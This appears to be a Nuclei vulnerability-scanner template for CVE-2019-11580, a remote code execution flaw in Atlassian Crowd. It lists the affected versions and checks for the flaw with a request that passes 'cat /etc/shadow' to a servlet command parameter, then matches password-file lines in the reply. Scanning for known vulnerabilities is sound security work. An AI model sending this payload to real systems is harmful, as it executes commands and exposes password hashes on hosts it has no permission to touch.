nuclei-templates/cves/2019/CVE-2019-11580.yaml

39 lines
1.4 KiB
YAML

id: CVE-2019-11580
info:
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
author: dwisiswant0
severity: critical
tags: cve,cve2019,atlassian,rce
description: |
Atlassian Crowd and Crowd Data Center
had the pdkinstall development plugin incorrectly enabled in release builds.
Attackers who can send unauthenticated or authenticated requests
to a Crowd or Crowd Data Center instance can exploit this vulnerability
to install arbitrary plugins, which permits remote code execution on
systems running a vulnerable version of Crowd or Crowd Data Center.
All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
reference:
- https://github.com/jas502n/CVE-2019-11580
- https://jira.atlassian.com/browse/CWD-5388
requests:
- method: GET
path:
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
- "bin:*:"
condition: and
part: body
- type: status
status:
- 200